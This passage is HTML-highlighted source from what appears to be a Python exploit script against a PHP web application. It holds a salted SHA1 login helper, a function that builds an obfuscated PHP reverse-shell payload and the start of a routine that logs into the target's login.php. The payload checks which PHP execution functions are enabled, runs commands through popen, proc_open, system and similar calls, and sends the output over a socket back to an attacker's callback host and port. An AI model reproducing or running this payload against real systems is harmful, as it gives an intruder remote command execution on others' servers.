class=\"crayon-e\">sha1<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">hash_stage_1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdigest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%s%s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hash_stage_1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdigest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-67\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-68\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_build_php_code<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-70\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;@set_time_limit(0); @ignore_user_abort(1); @ini_set(&#8216;max_execution_time&#8217;,0);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$dis=@ini_get(&#8216;disable_functions&#8217;);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(!empty($dis)){$dis=preg_replace(&#8216;\/[, ]+\/&#8217;, &#8216;,&#8217;, $dis);$dis=explode(&#8216;,&#8217;, $dis);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$dis=array_map(&#8216;trim&#8217;, $dis);}else{$dis=array();} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(!function_exists(&#8216;LcNIcoB&#8217;)){function LcNIcoB($c){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;global $dis;if (FALSE !== strpos(strtolower(PHP_OS), &#8216;win&#8217; )) {$c=$c.&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-i\">n<\/span><span class=\"crayon-s\">&#8220;;} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$imARhD=&#8217;is_callable&#8217;;$kqqI=&#8217;in_array&#8217;;&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if($imARhD(&#8216;popen&#8217;)and!$kqqI(&#8216;popen&#8217;,$dis)){$fp=popen($c,&#8217;r&#8217;);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=NULL;if(is_resource($fp)){while(!feof($fp)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o.=fread($fp,1024);}}@pclose($fp);}else&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if($imARhD(&#8216;proc_open&#8217;)and!$kqqI(&#8216;proc_open&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$handle=proc_open($c,array(array(pipe,&#8217;r&#8217;),array(pipe,&#8217;w&#8217;),array(pipe,&#8217;w&#8217;)),$pipes); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;@proc_close($handle);}else if($imARhD(&#8216;system&#8217;)and!$kqqI(&#8216;system&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;ob_start();system($c);$o=ob_get_contents();ob_end_clean(); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}else if($imARhD(&#8216;passthru&#8217;)and!$kqqI(&#8216;passthru&#8217;,$dis)){ob_start();passthru($c); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=ob_get_contents();ob_end_clean(); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}else if($imARhD(&#8216;shell_exec&#8217;)and!$kqqI(&#8216;shell_exec&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=shell_exec($c);}else if($imARhD(&#8216;exec&#8217;)and!$kqqI(&#8216;exec&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$nofuncs=&#8217;no exec functions&#8217;; &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(is_callable(&#8216;fsockopen&#8217;)and!in_array(&#8216;fsockopen&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$s=@fsockopen(&#8216;tcp:\/\/%s&#8217;,&#8217;%s&#8217;);while($c=fread($s,2048)){$out = &#8221;; &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}elseif (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;){break;}else{ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;break;}}fwrite($s,$out);}fclose($s);}else{ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,&#8217;%s&#8217;,&#8217;%s&#8217;); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;@socket_write($s,&#8221;<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">_<\/span>create<span class=\"crayon-s\">&#8220;);while($c=@socket_read($s,2048)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$out = &#8221;;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;} else if (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;) { &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}@socket_close($s);} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;?php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">?&gt;<\/span>&#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">phpkode<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-105\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-106\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_login<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-108\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;logs into the target<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-109\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) getting server token&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/login.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;) + &#8220;(.*)&#8221;)&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span 